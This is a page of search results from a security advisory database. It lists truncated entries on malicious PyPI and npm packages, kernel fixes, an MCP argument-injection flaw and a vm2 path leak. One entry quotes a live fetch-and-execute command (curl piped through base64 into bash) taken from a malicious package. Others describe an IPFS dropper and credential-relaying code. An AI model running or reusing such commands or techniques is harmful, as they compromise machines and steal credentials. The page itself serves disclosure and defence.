2127 matches found
MAL-2026-4812 Malicious code in m-at-star-tools (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2934ab77e0615ccddf2cf336b023659bafca2fe94bbf2f78e4c0d2a2ba1d7bf2 The package's sole consolescript m0scan m0scan/main.py:6-7 executes curl -sL https://mspy.qzz.io/M0scan | base64 -d | bash, fetching an opaque...
PT-2026-43425
Name of the Vulnerable Software and Affected Versions Vanetza versions 26.02 and earlier Description A denial-of-service issue exists in the cryptographic verification pipeline. When processing incoming V2X messages, the ASN.1 decoder accepts structures as syntactically valid even if semantic...
MAL-2026-4348 Malicious code in api-rs-node (npm)
A campaign of npm packages sharing a common dropper clob.js that downloads and persistently installs a Windows executable from IPFS on postinstall. The dropper fetches the binary from IPFS CID bafybeif3zkapj364ofnrvbty7oj5h5ufpxlp4s62usk3ulxrru35e3gssa via multiple public gateways Pinata,...
Malicious code in clobprice.api (npm)
A campaign of npm packages sharing a common dropper clob.js that downloads and persistently installs a Windows executable from IPFS on postinstall. The dropper fetches the binary from IPFS CID bafybeif3zkapj364ofnrvbty7oj5h5ufpxlp4s62usk3ulxrru35e3gssa via multiple public gateways Pinata,...
MAL-2026-4350 Malicious code in clobprice.api (npm)
A campaign of npm packages sharing a common dropper clob.js that downloads and persistently installs a Windows executable from IPFS on postinstall. The dropper fetches the binary from IPFS CID bafybeif3zkapj364ofnrvbty7oj5h5ufpxlp4s62usk3ulxrru35e3gssa via multiple public gateways Pinata,...
MAL-2026-4349 Malicious code in clob.api (npm)
A campaign of npm packages sharing a common dropper clob.js that downloads and persistently installs a Windows executable from IPFS on postinstall. The dropper fetches the binary from IPFS CID bafybeif3zkapj364ofnrvbty7oj5h5ufpxlp4s62usk3ulxrru35e3gssa via multiple public gateways Pinata,...
Malicious code in clob.api (npm)
A campaign of npm packages sharing a common dropper clob.js that downloads and persistently installs a Windows executable from IPFS on postinstall. The dropper fetches the binary from IPFS CID bafybeif3zkapj364ofnrvbty7oj5h5ufpxlp4s62usk3ulxrru35e3gssa via multiple public gateways Pinata,...
MAL-2026-4347 Malicious code in @devcarron/clob (npm)
A campaign of npm packages sharing a common dropper clob.js that downloads and persistently installs a Windows executable from IPFS on postinstall. The dropper fetches the binary from IPFS CID bafybeif3zkapj364ofnrvbty7oj5h5ufpxlp4s62usk3ulxrru35e3gssa via multiple public gateways Pinata,...
MAL-2026-4588 Malicious code in ionic-insta-api-wrapper (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 02b21f843420dc38a87320830c9f9bd48d72a2938774100b1ee08a2db708abbc ionic-insta-api-wrapper is presented as an Instagram API client but its advertised login API silently relays caller-supplied credentials and session...
Malicious code in ionic-insta-api-wrapper (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 02b21f843420dc38a87320830c9f9bd48d72a2938774100b1ee08a2db708abbc ionic-insta-api-wrapper is presented as an Instagram API client but its advertised login API silently relays caller-supplied credentials and session...
MAL-2026-4696 Malicious code in turing-sdk (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 01af0d34d23b6ed4e61390a21baec8c1bb81080c04945293a7e4ba8d20277ca6 package.json declares turing-code as an HTTPS tarball dependency at https://turing.tap365.org/v1.1.2/turing-code-1.1.2.tgz, bypassing the npm registr...
Malicious code in turing-sdk (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 01af0d34d23b6ed4e61390a21baec8c1bb81080c04945293a7e4ba8d20277ca6 package.json declares turing-code as an HTTPS tarball dependency at https://turing.tap365.org/v1.1.2/turing-code-1.1.2.tgz, bypassing the npm registr...
Astra Linux - уязвимость в linux-5.10, linux-6.1, linux, linux-5.15
In the Linux kernel, the following vulnerability has been resolved: hfsplus: Do not query the device’s logical block size multiple times. The block sizes of devices may change. One of these cases is a loop device, where the ioctl LOOPSETBLOCKSIZE is used. While this may cause other issues such as...
Astra Linux - уязвимость в traceroute
In Buc Traceroute 2.0.12 through 2.1.2 before 2.1.3, the wrapper scripts do not parse command lines properly...
Malicious code in sickle-wrapper (npm)
--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis cf0ce8be09572968ecc56d1879825b49624c7346a7391f203ea27e9ed0805674 The OpenSSF Package Analysis project identified 'sickle-wrapper' @ 0.2.0 npm as malicious. It is considered malicious because: - The package...
MAL-2026-4178 Malicious code in sickle-wrapper (npm)
--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis cf0ce8be09572968ecc56d1879825b49624c7346a7391f203ea27e9ed0805674 The OpenSSF Package Analysis project identified 'sickle-wrapper' @ 0.2.0 npm as malicious. It is considered malicious because: - The package...
GHSA-XPWW-F6PM-CFHQ dbt MCP Server has an Argument Injection in dbt CLI Tool Wrappers via node_selection and resource_type Parameters
Discovered through manual source code review. Verified by PoC execution against a local dbt-mcp v1.15.1 installation. Summary rundbtcommand in src/dbtmcp/dbtcli/tools.py constructs the dbt subprocess argument list by appending user-supplied MCP tool parameters without sanitization. Two independen...
ROS-20260514-73-0002
A vulnerability in the phparraymergewrapper function of the PHP programming language involves buffer copying without input validation. Exploitation of the vulnerability could allow a remote attacker to compromise data integrity and cause a denial of service...
CVE-2026-44002 vm2: Host File Path Disclosure via Stack Trace Information Leak
vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.0, vm2's CallSite wrapper class intended as a safe wrapper for V8's native CallSite blocks getThis and getFunction to prevent host object leakage, but allows getFileName to return unsanitized host absolute paths. Any sandboxed code can...
CVE-2026-44002
CVE-2026-44002 affects the vm2 sandbox for Node.js. Before 3.11.0, the CallSite wrapper blocks getThis() and getFunction() but allows getFileName() to reveal unsanitized host absolute paths. This enables sandboxed code to leak the host directory structure, library paths, and framework versions (v...